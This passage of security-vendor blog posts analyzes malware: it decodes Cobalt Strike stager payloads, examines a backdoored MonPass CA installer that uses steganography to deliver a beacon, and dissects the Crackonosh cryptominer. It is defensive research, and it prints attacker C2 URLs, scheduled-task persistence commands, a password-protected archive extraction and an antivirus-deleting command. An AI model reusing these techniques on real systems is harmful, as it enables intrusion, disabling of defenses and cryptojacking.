API function HttpOpenRequestA is called with following dwFlags (0x84600200):

Python parsing:
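The parsing screenshot is not reproduced here; below is a hedged sketch collecting the placeholders at the offsets quoted above (the exact position of the port immediate within the PUSH / MOV r8d instruction is an assumption):

import re, struct

OFFSETS = {   # placeholder offsets relative to the payload entry point, as listed above
    'x86': {'addr': 0x030C, 'port': 0x00BE, 'query': 0x0143, 'header': 0x0193},
    'x64': {'addr': 0x036A, 'port': 0x010D, 'query': 0x0186, 'header': 0x01D6},
}

def _cstr(data, offset, limit):
    return data[offset:offset + limit].split(b'\x00', 1)[0].decode('ascii', errors='replace')

def parse_http_stager(payload, arch='x86'):
    pattern = rb'\xFC\xE8' if arch == 'x86' else rb'\xFC\x48\x83\xE4\xF0\xE8'
    entry = re.search(pattern, payload).start()
    off = OFFSETS[arch]
    imm = off['port'] + (1 if arch == 'x86' else 2)   # skip the push / mov r8d opcode bytes
    return {
        'address': _cstr(payload, entry + off['addr'], 256),   # 256 is an arbitrary cap
        'port': struct.unpack_from('<I', payload, entry + imm)[0],
        'query': _cstr(payload, entry + off['query'], 80),
        'header': _cstr(payload, entry + off['header'], 304),
    }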

Default HTTP x86 payload API hashes:

Offset Hash value API name
0x009c 0x0726774c kernel32.dll_LoadLibraryA
0x00aa 0xa779563a wininet.dll_InternetOpenA
0x00c6 0xc69f8957 wininet.dll_InternetConnectA
0x00de 0x3b2e55eb wininet.dll_HttpOpenRequestA
0x00f2 0x7b18062d wininet.dll_HttpSendRequestA
0x010b 0x5de2c5aa kernel32.dll_GetLastError
0x0114 0x315e2145 user32.dll_GetDesktopWindow
0x0123 0x0be057b7 wininet.dll_InternetErrorDlg
0x02c4 0x56a2b5f0 kernel32.dll_ExitProcess
0x02d8 0xe553a458 kernel32.dll_VirtualAlloc
0x02f3 0xe2899612 wininet.dll_InternetReadFile

Default HTTP x64 payload API hashes:

Offset Hash value API name
0x00e9 0x0726774c kernel32.dll_LoadLibraryA
0x0101 0xa779563a wininet.dll_InternetOpenA
0x0120 0xc69f8957 wininet.dll_InternetConnectA
0x013f 0x3b2e55eb wininet.dll_HttpOpenRequestA
0x0163 0x7b18062d wininet.dll_HttpSendRequestA
0x0308 0x56a2b5f0 kernel32.dll_ExitProcess
0x0324 0xe553a458 kernel32.dll_VirtualAlloc
0x0342 0xe2899612 wininet.dll_InternetReadFile

Yara rules for HTTP x86 and x64 stagers:

HTTPS stagers x86 and x64

The payload structure and placeholders are almost the same as the HTTP stagers. The differences are only in payload sizes, placeholder offsets, usage of InternetSetOptionA API function (API hash 0x869e4675) and different dwFlags for calling the HttpOpenRequestA API function.

The default x86 payload size is 817 bytes and the default for the x64 version is 909 bytes long, plus the size of the request address string and the size of the Customer ID if present.

Request address

The placeholder offset for the x86 version is 0x0331 and 0x038D for the x64 payload version. The typical format is IPv4.

Request port

The hardcoded request port format is the same as for HTTP. The PUSH offset for the x86 version is 0x00C3. The MOV instruction for the x64 version is at offset 0x0110.

Request query

The placeholder for the request query has the same format and length as the HTTP version. The placeholder offset for the x86 version is 0x0168 and 0x01A9 for the x64 version.

Request header

The size and format of the request header placeholder are the same as in the HTTP version. The offset for the x86 version is 0x01B8 and 0x01F9 for the x64 version.

API function HttpOpenRequestA is called with following dwFlags (0x84A03200):

InternetSetOptionA API function is called with following parameters:

Python parsing:

Default HTTPS x86 payload API hashes:

Offset Hash value API name
0x009c 0x0726774c kernel32.dll_LoadLibraryA
0x00af 0xa779563a wininet.dll_InternetOpenA
0x00cb 0xc69f8957 wininet.dll_InternetConnectA
0x00e7 0x3b2e55eb wininet.dll_HttpOpenRequestA
0x0100 0x869e4675 wininet.dll_InternetSetOptionA
0x0110 0x7b18062d wininet.dll_HttpSendRequestA
0x0129 0x5de2c5aa kernel32.dll_GetLastError
0x0132 0x315e2145 user32.dll_GetDesktopWindow
0x0141 0x0be057b7 wininet.dll_InternetErrorDlg
0x02e9 0x56a2b5f0 kernel32.dll_ExitProcess
0x02fd 0xe553a458 kernel32.dll_VirtualAlloc
0x0318 0xe2899612 wininet.dll_InternetReadFile

Default HTTPS x64 payload API hashes:

Offset Hash value API name
0x00e9 0x0726774c kernel32.dll_LoadLibraryA
0x0101 0xa779563a wininet.dll_InternetOpenA
0x0123 0xc69f8957 wininet.dll_InternetConnectA
0x0142 0x3b2e55eb wininet.dll_HttpOpenRequestA
0x016c 0x869e4675 wininet.dll_InternetSetOptionA
0x0186 0x7b18062d wininet.dll_HttpSendRequestA
0x032b 0x56a2b5f0 kernel32.dll_ExitProcess
0x0347 0xe553a458 kernel32.dll_VirtualAlloc
0x0365 0xe2899612 wininet.dll_InternetReadFile

Yara rule for HTTPS x86 and x64 stagers:

The next stage or beacon can easily be downloaded with the curl or wget tool:

You can find our parser for raw payloads and all corresponding YARA rules in our IoC repository.

Raw Payloads encoding

Cobalt Strike also includes a payload generator for exporting raw stagers and payloads in multiple encoded formats. The encoded formats support UTF-8 and UTF-16LE.

Table of the most common encoding with usage and examples:

Encoding Usage Example
Hex VBS, HTA 4d5a9000..
Hex Array PS1 0x4d, 0x5a, 0x90, 0x00..
Hex Veil PY \x4d\x5a\x90\x00..
Decimal Array VBA -4,-24,-119,0..
Char Array VBS, HTA Chr(-4)&”H”&Chr(-125)..
Base64 PS1 38uqIyMjQ6..
gzip / deflate compression PS1
Xor PS1, Raw payloads, Beacons

Decoding most of the formats is pretty straightforward, but there are a few things to consider.

  • Values inside the Decimal and Char Arrays are split by "new lines" represented by "\s_\n" (\x20\x5F\x0A).
  • Common compression algorithms used inside PowerShell scripts are GzipStream and raw DeflateStream.

Python decompress implementation:
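The original snippet is a screenshot; an equivalent sketch in Python, trying the gzip container first and falling back to raw deflate (as produced by .NET's GzipStream and DeflateStream respectively):

import gzip, zlib

def decompress_payload(data):
    try:
        return gzip.decompress(data)        # GzipStream output has a gzip header
    except OSError:
        return zlib.decompress(data, -15)   # raw deflate stream, no zlib/gzip header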

XOR encoding

The XOR algorithm is used in three different cases. The first case is a one-byte XOR inside PS1 scripts; the default key value is 35 (0x23).

The second usage is a XOR with a dword key for encoding raw payloads or beacons inside PE stager binaries. The specific header for the XORed data is 16 bytes long and includes the start offset, the XORed data size, the XOR key and four 0x61 junk/padding bytes.

Python header parsing:
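The screenshot is not reproduced here; a hedged sketch of the header layout described above (the field order and the interpretation of the start offset as a file offset are assumptions):

import struct

def decode_xored_payload(image, header_offset):
    # 16-byte header: start offset, XORed data size, dword XOR key, four 0x61 padding bytes
    start, size, key, padding = struct.unpack_from('<IIII', image, header_offset)
    if padding != 0x61616161:
        raise ValueError('unexpected header padding')
    blob = bytearray(image[start:start + size])
    for i in range(0, len(blob) - 3, 4):               # dword-wise XOR with the static key
        struct.pack_into('<I', blob, i, struct.unpack_from('<I', blob, i)[0] ^ key)
    return bytes(blob)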

We can create a YARA rule based on the XOR key from the header and the first dword of the encoded data to verify the expected values there:

The third case is XOR encoding with a rolling dword key, used only for decoding downloaded beacons. The encoded data blob is located right after the XOR algorithm code without any padding. The encoded data starts with an initial XOR key (dword) and the data size (a dword XORed with the initial key).
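
As a rough illustration (not the decompiled stub itself), the decoding can be sketched as follows, assuming the commonly documented rolling scheme in which the next key is the previous ciphertext dword (equivalently, the key is XORed with each decoded dword):

import struct

def decode_rolling_xor(blob):
    key = struct.unpack_from('<I', blob, 0)[0]
    size = struct.unpack_from('<I', blob, 4)[0] ^ key
    out = bytearray()
    for off in range(8, 8 + size, 4):
        if off + 4 > len(blob):
            break
        enc = struct.unpack_from('<I', blob, off)[0]
        out += struct.pack('<I', enc ^ key)
        key = enc                                      # roll the key
    return bytes(out[:size])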

There are x86 and x64 implementations of the XOR algorithm. The Cobalt Strike resources include the xor.bin and xor64.bin files with precompiled XOR algorithm code.

The default lengths of the compiled x86 code are 52 and 56 bytes (depending on the registers used), plus the length of the junk bytes. The x86 implementation allows using different register sets, so the xor.bin file includes more than 800 different precompiled code variants.

Yara rule for covering all x86 variants with XOR verification:

The precompiled x64 code is 63 bytes long with no junk bytes. There is also only one precompiled code variant.

Yara rule for x64 variant with XOR verification:

You can find our raw payload decoder and extractor for the most common encodings here. It uses the parser from the previous chapter and can save you time and manual work. We also provide an IDAPython script for easy raw payload analysis.

Conclusion

As we see more and more abuse of Cobalt Strike by threat actors, understanding how to decode its use is important for malware analysis.

In this blog, we’ve focused on understanding how threat actors use Cobalt Strike payloads and how you can analyze them.

The next part of this series will be dedicated to Cobalt Strike beacons and parsing their configuration structure.

The post Decoding Cobalt Strike: Understanding Payloads appeared first on Avast Threat Labs.

Backdoored Client from Mongolian CA MonPass

Introduction

We discovered an installer downloaded from the official website of MonPass, a major certification authority (CA) in Mongolia in East Asia, that was backdoored with Cobalt Strike binaries. We immediately notified MonPass of our findings on 22 April 2021 and encouraged them to address their compromised server and notify those who downloaded the backdoored client.

We have confirmed with MonPass that they have taken steps to address these issues and are now presenting our analysis.

Our analysis beginning in April 2021 indicates that a public web server hosted by MonPass was breached potentially eight separate times: we found eight different webshells and backdoors on this server. We also found that the MonPass client available for download from 8 February 2021 until 3 March 2021 was backdoored. 

This research provides an analysis of the relevant backdoored installers and other samples that we found in the wild. During our investigation we also observed related research from NTT Ltd, so some technical details or IoCs may overlap.

All the samples are highly similar and share the same pdb path:

C:\Users\test\Desktop\fishmaster\x64\Release\fishmaster.pdb and the string: Bidenhappyhappyhappy.

Figure 1: Pdb path and specific string

Technical details

The malicious installer is an unsigned PE file. It starts by downloading the legitimate version of the installer from the MonPass official website. This legitimate version is dropped to the C:\Users\Public\ folder and executed under a new process. This guarantees that the installer behaves as expected, meaning that a regular user is unlikely to notice anything suspicious.

Additional similar installers were also found in the wild, with SHA256 hashes:  e2596f015378234d9308549f08bcdca8eadbf69e488355cddc9c2425f77b7535 and f21a9c69bfca6f0633ba1e669e5cf86bd8fc55b2529cd9b064ff9e2e129525e8.

Figure 2: This image is not as innocent as it may seem.

The attackers decided to use steganography to transfer shellcode to their victims. On execution, the malware downloads a bitmap image file from http://download.google-images[.]ml:8880/download/37.bmp as shown in Figure 2.

The download is performed in a slightly unusual way, using two HTTP requests. The first request uses the HEAD method to retrieve the Content-Length, followed by a second GET request to actually download the image. After the picture is downloaded, the malware extracts the encrypted payload as follows. The hidden data is expected to be up to 0x76C bytes. Starting with the 3rd byte of the image data, it copies every 4th byte. The resulting data represents an ASCII string of hexadecimal characters, which is later decoded into the respective binary values. These bytes are then XOR-decrypted using the hardcoded key miat_mg, resulting in a Cobalt Strike beacon.
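
As a rough illustration of that extraction (not the malware's actual code), the following sketch pulls the hidden bytes out of the image data; where the hex string ends (treated as NUL-terminated here) is an assumption:

from itertools import cycle

def extract_beacon(image_data, max_hidden=0x76C):
    hidden = image_data[2::4][:max_hidden]             # every 4th byte, starting with the 3rd
    hex_str = hidden.split(b'\x00', 1)[0].decode('ascii', errors='ignore')
    blob = bytes.fromhex(hex_str)
    return bytes(b ^ k for b, k in zip(blob, cycle(b'miat_mg')))   # XOR with the hardcoded key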

We have seen multiple versions of this backdoored installer, each with slightly modified decryptors. 

In one version (f21a9c69bfca6f0633ba1e669e5cf86bd8fc55b2529cd9b064ff9e2e129525e8), the XOR decryption was stripped.

In another version (e2596f015378234d9308549f08bcdca8eadbf69e488355cddc9c2425f77b7535), the basic anti-analysis tricks were stripped. In Figure 3, you can see different timestamps and the same rich headers.

Figure 3: Timestamps
Figure 4: Rich header.

In the backdoored installer we also observed some basic anti-analysis techniques used in an attempt to avoid detection. In particular, we observed checks for the number of processors using the GetSystemInfo function, the amount of physical memory using the GlobalMemoryStatusEx function and the disk capacity using the IOCTL_DISK_GET_DRIVE_GEOMETRY IOCTL call. If any of the obtained values are suspiciously low, the malware terminates immediately.

Figure 5: Anti-analysis techniques employed by the malware

Figure 6: Anti-analysis technique testing for disk capacity

One of the samples (9834945A07CF20A0BE1D70A8F7C2AA8A90E625FA86E744E539B5FE3676EF14A9) used a different, known technique to execute shellcode. First, the shellcode is decoded from a list of UUIDs with the UuidFromStringA API; then it is executed using EnumSystemLanguageGroupsA.

Figure 7: Decoding the list of UUIDs and executing shellcode.

After we found a backdoored installer on one of our customers’ machines, we commenced hunting for additional samples in VT and in our user base to determine if there were more backdoored installers in the wild. In VT we found some interesting hits:

Figure 8: VT hit

We analyzed the sample and found that it was very similar to the infected installers found on our customers’ machines. The sample contained the same anti-analysis techniques, used the same XOR decryption and also contained similar C2 server addresses (hxxp://download.google-images.ml:8880/download/x37.bmp) as observed in the previous backdoored installers. The sample also contained references to the link (hxxps://webplus-cn-hongkong-s-5faf81e0d937f14c9ddbe5a0.oss-cn-hongkong.aliyuncs[.]com/Silverlight_ins.exe) and the file path C:\users\public\Silverlight_ins.exe; however, these did not appear to be in use. The sample name, Browser_plugin (8).exe, is also unusual; we speculate that this may be a test sample uploaded by the actor.

In VT we saw another hash (4a43fa8a3305c2a17f6a383fb68f02515f589ba112c6e95f570ce421cc690910), again with the name Browser_plugin.exe. According to VT, this sample was downloaded from hxxps://jquery-code.ml/Download/Browser_Plugin.exe. It downloads the PDF file Aili.pdf from hxxp://37.61.205.212:8880/dow/Aili.pdf.

Figure 9: Content of Aili.pdf.

Afterwards, it has similar functionality to the previously mentioned samples from VT, meaning it downloads and decrypts a Cobalt Strike beacon from hxxp://micsoftin.us:2086/dow/83.bmp.

In our database we again found a similar sample, but with the name Browser_plugin (1).exe. This sample was downloaded from hxxp://37.61.205.212:8880/download/Browers_plugin.exe; we saw it on Feb 4, 2021. It doesn’t install any legitimate software, it just shows a MessageBox. It contains the C&C address hxxp://download.google-images.ml:8880/downloa/37.bmp (note: there is a typo in the directory name: downloa).

Compromised Web server content

On the breached web server from which the backdoored installer could be downloaded, we found two executables: DNS.exe (456b69628caa3edf828f4ba987223812cbe5bbf91e6bbf167e21bef25de7c9d2) and another Browser_plugin.exe (5cebdb91c7fc3abac1248deea6ed6b87fde621d0d407923de7e1365ce13d6dbe).

DNS.exe

It downloads a bat file from the C&C server (hxxp://download.google-images.ml:8880/download/DNSs.bat), which is saved as C:\users\public\DNS.bat. It contains this script:

Figure 10: DNS.bat script

In its second part, the executable contains similar functionality and the same C&C server address as the backdoored installer that we mentioned earlier.

Browser_plugin.exe

(5cebdb91c7fc3abac1248deea6ed6b87fde621d0d407923de7e1365ce13d6dbe)

This sample is very similar to the one above (4a43fa8a3305c2a17f6a383fb68f02515f589ba112c6e95f570ce421cc690910), with the same C&C server address, but it doesn’t download any additional document.

C&C server analysis

We checked the malicious web server hxxps://jquery-code.ml, from which Browser_plugin.exe (4A43FA8A3305C2A17F6A383FB68F02515F589BA112C6E95F570CE421CC690910) was downloaded. The malicious web server looks identical to the legitimate one, https://code.jquery.com/; the difference is the certificate. The legitimate server https://code.jquery.com is signed by Sectigo Limited, while the malicious server is signed by Cloudflare, Inc.

Figure 11: Comparing two sites

Conclusion

This blog post outlines our findings regarding the MonPass client backdoored with Cobalt Strike. 

In our research we found additional variants on VirusTotal in addition to those we found on the compromised MonPass web server. 

In our analysis of the compromised client and variants, we’ve shown that the malware was using steganography to decrypt Cobalt Strike beacon. 

At this time, we’re not able to attribute these attacks with an appropriate level of confidence. However, it’s clear that the attackers intended to spread malware to users in Mongolia by compromising a trustworthy source, which in this case is a CA in Mongolia.

Most importantly, anyone that has downloaded the MonPass client between 8 February 2021 until 3 March 2021 should take steps to look for and remove the client and the backdoor it installed. 

I would like to thank Jan Rubín for helping me with this research.

Timeline of communication:

  • March 24, 2021 – Discovered backdoored installer.
  • April 8, 2021 – Initial contact with MonPass through MN CERT/CC, providing findings.
  • April 20, 2021 – MonPass shared a forensic image of the infected web server with Avast Threat Labs.
  • April 22, 2021 – Avast provided information about the incident and findings from the forensic image in a call with MonPass and MN CERT/CC.
  • May 3, 2021 – Avast followed up with MonPass via email. No response.
  • May 10, 2021 – Avast sent an additional follow-up email.
  • June 4, 2021 – MonPass replied, asking for information already provided on April 22, 2021.
  • June 14, 2021 – Follow-up from Avast to MonPass, no response.
  • June 29, 2021 – Final email to MonPass indicating our plans to publish, with a draft of the blog for feedback.
  • June 29, 2021 – Information from MonPass indicating they’ve resolved the issues and notified affected customers.
  • July 1, 2021 – Blog published.

Indicators of Compromise (IoC)

Timeline of compilation timestamps:

date & time (UTC) SHA256
Feb  3, 2021 07:17:14 28e050d086e7d055764213ab95104a0e7319732c041f947207229ec7dfcd72c8
Feb 26, 2021 07:16:23 f21a9c69bfca6f0633ba1e669e5cf86bd8fc55b2529cd9b064ff9e2e129525e8
Mar  1, 2021 07:56:04 e2596f015378234d9308549f08bcdca8eadbf69e488355cddc9c2425f77b7535
Mar  4, 2021 02:22:53 456b69628caa3edf828f4ba987223812cbe5bbf91e6bbf167e21bef25de7c9d2
Mar 12, 2021 06:25:25 a7e9e2bec3ad283a9a0b130034e822c8b6dfd26dda855f883a3a4ff785514f97
Mar 16, 2021 02:25:40 5cebdb91c7fc3abac1248deea6ed6b87fde621d0d407923de7e1365ce13d6dbe
Mar 18, 2021 06:43:24 379d5eef082825d71f199ab8b9b6107c764b7d77cf04c2af1adee67b356b5c7a
Mar 26, 2021 08:17:29 9834945a07cf20a0be1d70a8f7c2aa8a90e625fa86e744e539b5fe3676ef14a9
Apr 6, 2021 03:11:40 4a43fa8a3305c2a17f6a383fb68f02515f589ba112c6e95f570ce421cc690910


The post Backdoored Client from Mongolian CA MonPass appeared first on Avast Threat Labs.

Crackonosh: A New Malware Distributed in Cracked Software

24 June 2021 at 09:39

We recently became aware of customer reports advising that Avast antivirus was missing from their systems – like the following example from Reddit.

From Reddit

We looked into this report and others like it and have found a new malware we’re calling “Crackonosh” in part because of some possible indications that the malware author may be Czech. Crackonosh is distributed along with illegal, cracked copies of popular software and searches for and disables many popular antivirus programs as part of its anti-detection and anti-forensics tactics.

In this posting we analyze Crackonosh. We look first at how Crackonosh is installed. In our analysis we found that it drops three key files winrmsrv.exe, winscomrssrv.dll and winlogui.exe which we analyze below. We also include information on the steps it takes to disable Windows Defender and Windows Update as well as anti-detection and anti-forensics actions. We include information on how to remove Crackonosh. Finally, we include indicators of compromise for Crackonosh.

Number of hits since December 2020. In total over 222,000 unique devices.
Number of users infected by Crackonosh since December 2020. In May it is still about a thousand hits every day.

The main goal of Crackonosh is the installation of the coinminer XMRig. Of all the wallets we found, there was one for which we were able to find statistics: the pool sites showed payments of 9,000 XMR in total, which at today’s prices is over $2,000,000 USD.

Statistics from xmrpool.eu
Statistics from MoneroHash

Installation of Crackonosh

The diagram below depicts the entire Crackonosh installation process.

Diagram of installation
  1. First, the victim runs the installer for the cracked software.
  2. The installer runs maintenance.vbs
  3. Maintenance.vbs then starts the installation using serviceinstaller.msi
  4. Serviceinstaller.msi registers and runs serviceinstaller.exe, the main malware executable.
  5. Serviceinstaller.exe drops StartupCheckLibrary.DLL.
  6. StartupCheckLibrary.DLL downloads and runs wksprtcli.dll.
  7. Wksprtcli.dll extracts a newer winlogui.exe and drops winscomrssrv.dll and winrmsrv.exe, which it contains, decrypts and places in the folder.

From the original compilation dates of Crackonosh we identified 30 different versions of serviceinstaller.exe, the main malware executable, from 31.1.2018 up to 23.11.2020. It is easy to find out that serviceinstaller.exe is started from a registry key created by maintenance.vbs.

The only clue to what happens before maintenance.vbs creates this registry key, and how the files appear on the victim’s computer, is the removal of the InstallWinSAT task in maintenance.vbs. Hunting led us to uncover uninstallation logs containing Crackonosh unpacking details from when it was installed with cracked software.

The following strings were found in uninstallation logs:

  • {sys}\7z.exe
  • -ir!*.*? e -pflk45DFTBplsd -y "{app}\base_cfg3.scs" -o{sys}
  • -ir!*.*? e -pflk45DFTBplsd -y "{app}\base_cfg4.scs" -o{localappdata}\Programs\Common
  • /Create /SC ONLOGON /TN "Microsoft\Windows\Maintenance\InstallWinSAT" /TR Maintenance.vbs /RL HIGHEST /F
  • /Create /SC ONLOGON /TN "Microsoft\Windows\Application Experience\StartupCheckLibrary" /TR StartupCheck.vbs /RL HIGHEST /F

This shows us that Crackonosh was packed in a password protected archive and unpacked in the process of installation. Here are infected installers we found:

Name of infected installer SHA256
NBA 2K19 E497EE189E16CAEF7C881C1C311D994AE75695C5087D09051BE59B0F0051A6CF
Grand Theft Auto V 65F39206FE7B706DED5D7A2DB74E900D4FAE539421C3167233139B5B5E125B8A
Far Cry 5 4B01A9C1C7F0AF74AA1DA11F8BB3FC8ECC3719C2C6F4AD820B31108923AC7B71
The Sims 4 Seasons 7F836B445D979870172FA108A47BA953B0C02D2076CAC22A5953EB05A683EDD4
Euro Truck Simulator 2 93A3B50069C463B1158A9BB3A8E3EDF9767E8F412C1140903B9FE674D81E32F0
The Sims 4 9EC3DE9BB9462821B5D034D43A9A5DE0715FF741E0C171ADFD7697134B936FA3
Jurassic World Evolution D8C092DE1BF9B355E9799105B146BAAB8C77C4449EAD2BDC4A5875769BB3FB8A
Fallout 4 GOTY 6A3C8A3CA0376E295A2A9005DFBA0EB55D37D5B7BF8FCF108F4FFF7778F47584
Call of Cthulhu D7A9BF98ACA2913699B234219FF8FDAA0F635E5DD3754B23D03D5C3441D94BFB
Pro Evolution Soccer 2018 8C52E5CC07710BF7F8B51B075D9F25CD2ECE58FD11D2944C6AB9BF62B7FBFA05
We Happy Few C6817D6AFECDB89485887C0EE2B7AC84E4180323284E53994EF70B89C77768E1
Infected installers

The Inno Setup installer executes the following script. If it finds it "safe" to run the malware, it installs Crackonosh to %SystemRoot%\system32\ and one configuration file to %localappdata%\Programs\Common, and creates two tasks in the Windows Task Scheduler: InstallWinSAT to start maintenance.vbs and StartupCheckLibrary to start StartupcheckLibrary.vbs. Otherwise, it does nothing at all.

Reconstructed Crackonosh Inno Setup installer script

Installation script

Analysis of Maintenance.vbs

As noted before, the Crackonosh installer registers the maintenance.vbs script with the Windows Task Scheduler and sets it to run on system startup. Maintenance.vbs creates a counter that counts system startups until it reaches the 7th or 10th system start, depending on the version. After that, maintenance.vbs runs serviceinstaller.msi, disables hibernation mode on the infected system and sets the system to boot into safe mode on the next restart. To cover its tracks, it also deletes serviceinstaller.msi and maintenance.vbs.

Below is the maintenance.vbs script:

Maintenance.vbs

Serviceinstaller.msi does not manipulate any files on the system; it only modifies the registry to register serviceinstaller.exe, the main malware executable, as a service and to allow it to run in safe mode. Below you can see the registry entries serviceinstaller.msi makes.

MSI Viewer screenshot of serviceinstaller.msi

Using Safe Mode to Disable Windows Defender and Antivirus

While the Windows system is in safe mode, antivirus software doesn’t work. This enables the malicious serviceinstaller.exe to easily disable and delete Windows Defender. It also uses WQL to query all installed antivirus software with SELECT * FROM AntiVirusProduct. If it finds any of the following antivirus products, it deletes them with the command rd <AV directory> /s /q, where <AV directory> is the default directory name the specific antivirus product uses.

  • Adaware
  • Bitdefender
  • Escan
  • F-secure
  • Kaspersky
  • Mcafee (scanner only)
  • Norton
  • Panda

It contains the names of the folders where these products are installed, and finally it deletes %PUBLIC%\Desktop\.

Older versions of serviceinstaller.exe used pathToSignedProductExe to obtain the containing folder. This folder was then deleted. This way Crackonosh could delete older versions of Avast or current versions with Self-Defense turned off.

It also drops StartupCheckLibrary.dll and winlogui.exe to %SystemRoot%\system32\ folder.

Older versions of serviceinstaller.exe drop windfn.exe, which is responsible for dropping and executing winlogui.exe. Winlogui.exe contains the XMRig coinminer. In newer versions, serviceinstaller.exe drops winlogui.exe directly and creates the following registry entry:

This connects the infected PC to the mining pool on every start.

Disabling Windows Defender and Windows Update

It deletes the following registry entries to stop Windows Defender and turn off automatic updates.

commands executed by serviceinstaller.exe

In place of Windows Defender, it installs its own MSASCuiL.exe, which puts the Windows Security icon into the system tray.

It has the right icon
Deleted Defender

Searching for Configuration Files 

Looking at the behavior of winrmsrv.exe (aaf2770f78a3d3ec237ca14e0cb20f4a05273ead04169342ddb989431c537e83) revealed something interesting in its API calls: there were over a thousand calls to FindFirstFileExW and FindNextFileExW. We looked at what file it was looking for; unfortunately, the malware author hid the name of the file behind a SHA256 hash, as shown below.

In this image, you see the function searching for a file by hash of file name from winrmsrv.exe. Some nodes are grouped for better readability.

This technique was used in other parts of Crackonosh, sometimes with SHA1. 

Here is a list of searched hashes and corresponding names and paths. In the case of UserAccountControlSettingsDevice.dat the search is also done recursively in all subfolders. 

  • in CSIDL_SYSTEM
    • File 7B296FC0-376B-497d-B013-58F4D9633A22-5P-1.B5841A4C-A289-439d-8115-50AB69CD450
      • SHA1: F3764EC8078B4524428A8FC8119946F8E8D99A27
      • SHA256: 86CC68FBF440D4C61EEC18B08E817BB2C0C52B307E673AE3FFB91ED6E129B273
    • File 7B296FC0-376B-497d-B013-58F4D9633A22-5P-1.B5841A4C-A289-439d-8115-50AB69CD450B
      • SHA1: 1063489F4BDD043F72F1BED6FA03086AD1D1DE20
      • SHA256: 1A57A37EB4CD23813A25C131F3C6872ED175ABB6F1525F2FE15CFF4C077D5DF7
  • Searched in CSIDL_Profile and actual location is %localappdata%\Programs\Common
    • File UserAccountControlSettingsDevice.dat
      • SHA1: B53B0887B5FD97E3247D7D88D4369BFC449585C5
      • SHA256: 7BB5328FB53B5CD59046580C3756F736688CD298FE8846169F3C75F3526D3DA5

These files contain configuration information encrypted with a XOR cipher, with the keys stored in the executables.

After decryption, we found the names of other parts of the malware, some URLs, RSA public keys, communication keys for winrmsrv.exe and commands for XMRig. The RSA keys are 8192 and 8912 bits long. These keys are used to verify every file downloaded by Crackonosh (via StartupCheckLibrary.dll, winrmsrv.exe, winscomrssrv.dll).

Here we found the first mention of wksprtcli.dll.

StartupCheckLibrary.dll and Download of wksprtcli.dll

StartupCheckLibrary.dll is the way the Crackonosh author can download Crackonosh updates onto infected machines. StartupCheckLibrary.dll queries the TXT DNS records of the domains first[.]universalwebsolutions[.]info and second[.]universalwebsolutions[.]info (or other TLDs like getnewupdatesdownload[.]net and webpublicservices[.]org). There are TXT DNS records like [email protected]@@FEpHw7Hn33. From the first twelve letters it computes the IP address, as shown in the image below. The next five characters are the digits of the port, encrypted by adding 16. This gives a socket from which to download wksprtcli.dll. The last eight characters are the version. The downloaded data is validated against one of the public keys stored in the config file.

Decryption of IP address, screenshot from Ida

Wksprtcli.dll (which exports DllGetClassObjectMain) updates older versions of Crackonosh. The oldest version of wksprtcli.dll that we found only checks for the nonexistence of winlogui.exe, then deletes diskdriver.exe (the previous coinminer) and its autostart registry entry. The newest version has a time frame in which it runs. It deletes older versions of winlogui.exe or diskdriver.exe and drops a new version of winlogui.exe. It drops new config files and installs winrmsrv.exe and winscomrssrv.dll. It also changed the way winlogui.exe is started, from the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to a task scheduled on user login.

Tasks created in Windows task scheduler by wksprtcli.dll

Finally, it disables hibernation and Windows Defender.

Wksprtcli.dll also checks the computer time. The reason may be to avoid overwriting newer versions and to make dynamic analysis harder. It also contains a hardcoded date after which it stops the winlogui task so that it is able to replace files.

File (time of compilation) Timestamp 1 (after this it kills the winlogui task, so it can update it) Timestamp 2 (before this it runs)
5C8B… (2020-11-20) 2019-12-01 2023-12-30
D9EE… (2019-11-24) 2019-12-01 2020-12-06
194A… (2019-11-24) 2019-03-09
FA87… (2019-03-22) Uses winlogui size instead 2019-11-02
C234… (2019-02-24) 2019-03-09 2019-11-02
A2D0… (2018-12-27)
D3DD… (2018-10-13)
Hardcoded timestamps, full file hashes are in IoCs

Analysis of Winrmsrv.exe

Winrmsrv.exe is responsible for the P2P connection between infected machines. It exchanges version info and is able to download newer versions of Crackonosh. We didn’t find any evidence of versions higher than 0, and therefore we don’t know what files are transferred.

Winrmsrv.exe checks for an internet connection. If it succeeds, it derives three different ports in the following way.

First, an offset (49863) and a range (33575) are defined in the config file. For every port, a SHA-256 hash is computed from the date (days since the Unix epoch) and 10 bytes from the config file. Each port is then set to the offset plus the first word of the SHA-256 modulo the range (offset + (2 B of SHA % range)).

The first two ports are used for incoming TCP connections. The last one is used to listen for incoming UDP packets.

Obtain ports, screenshot from IDA
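
As a rough illustration of that derivation (with the byte order of the day value, the way it is combined with the 10 config bytes, and the choice of digest bytes all being assumptions), a sketch could look like this:

import hashlib, struct, time

def derive_port(config_bytes10, offset=49863, port_range=33575, day=None):
    if day is None:
        day = int(time.time()) // 86400                  # days since the Unix epoch
    digest = hashlib.sha256(struct.pack('<I', day) + config_bytes10).digest()
    first_word = struct.unpack_from('<H', digest)[0]     # first two bytes of the digest
    return offset + (first_word % port_range)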

Next, winrmsrv.exe starts sending UDP packets containing the version and a timestamp to the third port of random IP addresses (approximately 10 IPs per second). The packet is padded with random bytes (to a random length) and encrypted with a Vigenère cipher.

UDP packet

Finally, if winrmsrv.exe finds an IP address infected with Crackonosh, it stores the IP, checks the version and starts updating the older instance with the newer one. The update data is signed with the private key. On the next start, winrmsrv.exe connects to all stored IPs to check their versions before trying new ones. It blocks every IP address after the communication, for 4 hours, unless the peer didn’t follow the protocol, in which case the block is permanent (until restart).

We modified masscan to check for this protocol. It showed about 370 infected IP addresses across the internet (IPv4).

A UDP Hello B
A: sends a UDP packet from a random port to B's port 3 -> B: decrypts it, checks the timestamp (within the last 15 s) and, if the versions match, bans the IP address for the next 4 hours
A: decrypts it, checks the timestamp; same version: do nothing; B has a lower version: TCP send; B has a higher version: TCP receive <- B: sends a UDP Crackonosh Hello packet to A's port
A TCP Send B
A: connects to port 2 -> B: checks whether the communication from A is expected (a successful UDP Hello in the last 5 seconds with different versions)
A: sends an encrypted packet -> B: decodes the data, validates and saves it
A TCP Receive B
A: connects to port 1 -> B: checks whether the communication from A is expected (a successful UDP Hello in the last 5 seconds with different versions)
A: decodes the data, validates and saves it <- B: sends an encrypted packet
Communication diagram
Encryption scheme of the UDP Packet
Encryption scheme of the TCP Packet

Notably, there is a mistake in the TCP encryption/decryption implementation shown above. Where the red arrow points, one more SHA-256 is computed that should be used in the XOR with the initialization vector, but the input of that hash is used instead of its result.

